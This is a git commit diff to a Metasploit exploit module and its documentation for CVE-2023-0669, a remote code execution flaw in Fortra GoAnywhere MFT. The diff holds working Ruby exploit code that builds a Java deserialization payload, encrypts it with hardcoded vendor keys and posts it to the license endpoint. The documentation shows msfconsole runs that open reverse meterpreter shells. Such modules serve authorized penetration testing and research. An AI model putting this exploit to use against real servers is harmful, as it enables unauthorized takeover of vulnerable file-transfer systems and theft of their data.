Merge pull request #3 from smcintyre-r7/pr/collab/17607
Pr/collab/17607
This commit is contained in:
commit
0c6ebed3ac
|
@ -10,7 +10,7 @@ register - you can just create a free account and download the application.
|
|||
1. Install the application
|
||||
1. Start the application on the server with `./goanywhere.sh start`
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669`
|
||||
1. Do: `use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669`
|
||||
1. Set `LHOST` / `RHOST`
|
||||
1. Do: `run`
|
||||
1. You should get a shell.
|
||||
|
@ -19,20 +19,19 @@ register - you can just create a free account and download the application.
|
|||
|
||||
### TARGET_URI
|
||||
|
||||
Set to the base path for the exploit - the default
|
||||
(`/goanywhere/lic/accept?bundle=`) is usually fine.
|
||||
Set to the base path for the exploit - the default (`/goanywhere/lic/accept`) is usually fine.
|
||||
|
||||
### VERSION
|
||||
### Version
|
||||
|
||||
The version number of the encryption, which is appended to the encrypted text.
|
||||
Changing the target will change this, but normally you don't have to tweak this.
|
||||
|
||||
Some hosts (like in FIPS-compliant mode) don't allow version 1, but preumably
|
||||
Some hosts (like in FIPS-compliant mode) don't allow version 1, but presumably
|
||||
there are older hosts that don't support version 2.
|
||||
|
||||
### ENCRYPTION_KEY / ENCRYPTION_IV / ENCRYPTION_ALGORITHM
|
||||
### EncryptionKey / EncryptionIv / EncryptionAlgorithm
|
||||
|
||||
How to encrypt the object. Depending on the `VERSION`, there are different
|
||||
How to encrypt the object. Depending on the `Version`, there are different
|
||||
keys. This is updated when you change TARGET and probably doesn't need to be
|
||||
changed.
|
||||
|
||||
|
@ -41,7 +40,7 @@ changed.
|
|||
### Version 7.1.1 on Fedora Linux
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
||||
|
@ -63,7 +62,7 @@ Server username: ron
|
|||
### Using an earlier encryption version
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
||||
|
@ -102,7 +101,7 @@ meterpreter >
|
|||
# Version 7.1.1 over HTTP
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
|
||||
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
|
||||
|
||||
msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
|
|
@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::JavaDeserialization
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -29,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => '2023-02-01',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => ['unix', 'win'],
|
||||
'Arch' => [ARCH_CMD],
|
||||
'Privileged' => false,
|
||||
'Targets' => [
|
||||
|
@ -37,10 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Version 2 Encryption',
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'VERSION' => '$2',
|
||||
'ENCRYPTION_KEY' => 'Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=',
|
||||
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
|
||||
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
|
||||
'Version' => '$2',
|
||||
'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',
|
||||
'EncryptionIv' => '4145532f4342432f504b435335506164'
|
||||
}
|
||||
},
|
||||
],
|
||||
|
@ -48,10 +46,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Version 1 Encryption',
|
||||
{
|
||||
'DefaultOptions' => {
|
||||
'VERSION' => nil,
|
||||
'ENCRYPTION_KEY' => 'Z4tYML+Lii4EdLl9bNGOhF+8SxH8oNavLbHrEUwp/Es=',
|
||||
'ENCRYPTION_IV' => 'QUVTL0NCQy9QS0NTNVBhZA==',
|
||||
'ENCRYPTION_ALGORITHM' => 'AES-256-CBC'
|
||||
'Version' => '',
|
||||
'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',
|
||||
'EncryptionIv' => '4145532f4342432f504b435335506164'
|
||||
}
|
||||
}
|
||||
],
|
||||
|
@ -59,8 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 8001,
|
||||
'SSL' => true,
|
||||
'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'
|
||||
'SSL' => true
|
||||
},
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -75,30 +71,52 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptString.new('VERSION', [false, 'A version value to append to the encrypted data', '$2']),
|
||||
OptString.new('ENCRYPTION_KEY', [true, 'The encryption key to use (base64-encoded)']),
|
||||
OptString.new('ENCRYPTION_IV', [true, 'The initialization vector (base64-encoded)']),
|
||||
OptString.new('ENCRYPTION_ALGORITHM', [true, 'The encryption algorithm'])
|
||||
OptString.new('Version', [false, 'A version value to append to the encrypted data']),
|
||||
OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
|
||||
OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),
|
||||
OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])
|
||||
])
|
||||
end
|
||||
|
||||
def build_cipher
|
||||
unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) }
|
||||
raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })
|
||||
end
|
||||
|
||||
cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm'])
|
||||
cipher.encrypt
|
||||
|
||||
option_errors = {}
|
||||
iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join
|
||||
unless cipher.iv_len == iv.length
|
||||
option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."
|
||||
end
|
||||
|
||||
key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join
|
||||
unless cipher.key_len == key.length
|
||||
option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."
|
||||
end
|
||||
raise Msf::OptionValidateError, option_errors unless option_errors.empty?
|
||||
|
||||
cipher.iv = iv
|
||||
cipher.key = key
|
||||
cipher
|
||||
end
|
||||
|
||||
def exploit
|
||||
vprint_status('Generating a serialized Java object with the payload')
|
||||
obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)
|
||||
|
||||
vprint_status('Encrypting the payload')
|
||||
cipher = OpenSSL::Cipher.new(datastore['ENCRYPTION_ALGORITHM'])
|
||||
cipher.encrypt
|
||||
cipher.iv = Base64.decode64(datastore['ENCRYPTION_IV'])
|
||||
cipher.key = Base64.decode64(datastore['ENCRYPTION_KEY'])
|
||||
cipher = build_cipher
|
||||
obj = cipher.update(obj) + cipher.final
|
||||
|
||||
vprint_status('Sending request to the server')
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['TARGETURI'],
|
||||
'vars_get' => {
|
||||
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['VERSION'] || ''}"
|
||||
'vars_post' => {
|
||||
'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"
|
||||
}
|
||||
)
|
||||
|
Loading…
Reference in New Issue